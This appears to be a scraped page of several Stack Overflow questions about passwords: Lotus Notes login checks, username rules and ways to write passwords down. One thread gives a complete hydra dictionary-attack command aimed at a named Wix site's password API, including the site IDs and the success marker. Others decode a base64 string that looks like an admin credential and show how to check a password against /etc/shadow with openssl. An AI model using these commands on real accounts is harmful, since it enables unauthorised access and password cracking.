Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
How can I validate whether or not a correct username and password has been entered? I would like to prompt a user if their entered username/password did not find a match in the Notes address book.
If you try a NotesView.update() with wrong credentials it will fail, the callback function will get false as first parameter and I assume that it will get a specific error as second parameter.
I don't think you can compare the password with passwords stored in the Domino address book. In Domino, the passwords are only saved as salted hash, and there is no way you can create the same hash value on the iOS device.
Just get the username and password and compare it against the data you stored in your address book. if you are using some encryption the conception is a bit different but you still have to perform a comparison.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 11 months ago.
Improve this question
I am trying to write a linux command to get into a Wix website I have created and put a password on. I have created the webpage to specifically show my students how easy it is for a hacker to crack a simple password, and hence the importance of strong passwords.
The website I have put the simple password on is https://missyjezabel.wixsite.com/my-site
I have written the following command to crack the password. Unfortunately, although it runs, it does not give the correct password.
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
Any ideas of how to get it to work?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form"/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
The site reaches out to an API endpoint that uses a different address to verify that the password matches with the given site-id:
site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
Target that site with correct JSON params:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
If the password is correct the response contains a "success":true json field.
S=\"success\"\:true
And some necessary headers to include in the requests:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\:
*/*:H=Content-Type\: application/json
As of a dictionary attack, the password.txt must contain the valid password otherwise it will fail. For the given scenario I would recommend a short manually created list.
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 1 year ago.
Improve this question
I want to know how to decrypt a text without knowing the key used or the algorithm such as this text:
RUE2RDRDMDE5OTpxci1hZG1pbi1yZWFkZXIxOjAwMDdDMUJBOEU4Q0IyOUQwNjg1RkJDRkMzMDdDMjc4:Nzg0MTk5MDUzMjA1OTEyXzk3MTUwODkzODk1MjpuY2hjNnkzenFkb2tvZXR0cWR2OTo2OEJFNkFCMTY4RjNGMTdFNUJFRjY3OTgwQjgwMDBTRVZBQURZRUVSVUFBTDBBTUtGdFM2QVNIQUwwRUE=
does this text has any signs that could help me to know at least what is the algorithm used? and then how to decrypt without knowing the key?
This is base64 encrypted there are no key needed for this. But in general, you can test all possible encryption algorithms and look at all the results.
Decoded:
EA6D4C0199:qr-admin-reader1:0007C1BA8E8CB29D0685FBCFC307C278784199053205912_971508938952:nchc6y3zqdokoettqdv9:68BE6AB168F3F17E5BEF67980B8000SEVAADYEERUAAL0AMKFtS6ASHAL0EA
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
Improve this question
So my question is straight forward given a linux username and a password how can I test if it is a valid account?
You can validate that a given password is correct for a given username using the shadow file.
On most modern distributions, the hashed passwords are stored in the shadow file /etc/shadow (which is only readable by root). As root, pull the line from the shadow file for the given user like so:
cat /etc/shadow | grep username
You will see something like this:
username:$1$TrOIigLp$PUHL00kS5UY3CMVaiC0/g0:15020:0:99999:7:::
After the username there is $1. This indicates that it is an MD5 hash. After that there is another $, then (in this case) TrOIigLp followed by another $. TrOIigLp is the salt. After that is the hashed password, which was hashed using the salt - in this case PUHL00kS5UY3CMVaiC0/g0.
Now, you can use openssl to hash the given password using the same salt, like so:
openssl passwd -1 -salt TrOIigLp
Enter the given password when prompted, the openssl command should compute the MD5 hash using the salt provided, and it should be exactly the same as the above from the shadow file. The -1 in the above command is for MD5 hashing.
If you are concerned about security (which you should be), the accepted answer represents a security risk by leaving the plaintext password in the ~/.bash_history file. With this in mind, it would be better to try logging in, or perhaps removing this entry from the ~/.bash_history.
Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 2 years ago.
Improve this question
I've come across a system that requires you to include a number in your username. I feel this is pointless, as the username should be easy to remember, and not be subject to requirements that may be applied to passwords.
However I can't find a good write up of the reasons for this. Can anyone reference a good source for this, and/or explain it in better words than I can?
Edit: I'm getting answers explaining why they do this, which are certainly of value, but there must be a write up somewhere of how to make a secure login system, that advocates a simple, easy to remember username.
Having no clue about the specific system mentioned, if one can call support and say something like "My username is John and I forgot my password" - adding a number may add just a bit of security.
Also, if the system is not protected against brute-force attacks, one can try common usernames together with common passwords.
I agree with Xavjer: the reason for this is most likely not security-related.
I agree with you: If the requirement is security-related - the security scheme is probably wrong.
Edit:
Another idea - Maybe they want to force you to use a username which is different than the one you use on other sites. Since many users tend to select the same username and password for different sites, and in case the password is compromised on one of these sites - this may help (but again, just a bit).
I would say it could be because if you force a number in an username, you will most likely never receive a dublicate name problem. There wont be someone having for example the name 'peter' and then there is a 'peter95' and a 'peter112'. No one will have the original one.
This is just what I think is the most reasonable answer.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 13 years ago.
Improve this question
There are several ways to secure passwords with an automated encryption algorithm, but sometimes it's best to write it down on paper and keep the paper itself secured. Hackers can't easily get to paper. However, if someone finds that paper, they can see the passwords plainly.
What's a non-automated method of securing information on a piece of paper? For example, have the real password be in every other character (eg p1a2s3s4w5o6r7d8 = password).
Take a character sequence from a book you have lying besides your computer. You can take the sequence in any number of ways: First/second/etc. letter of each word in a chapter you decide, for example.
Have a look here for some history and ideas about steganography ;) Your example is a simple working one, you can even use an invisible ink or write it backwards with only every 5th character relevant etc., it is up to your imagination :)
What youre suggesting is a simple cypher. I'm not sure why you'd want to implement something like that vs. using a password manager like KeyPass but you can us a simple substitution cyper where A=Z, Z=A etc. if you need to write it down.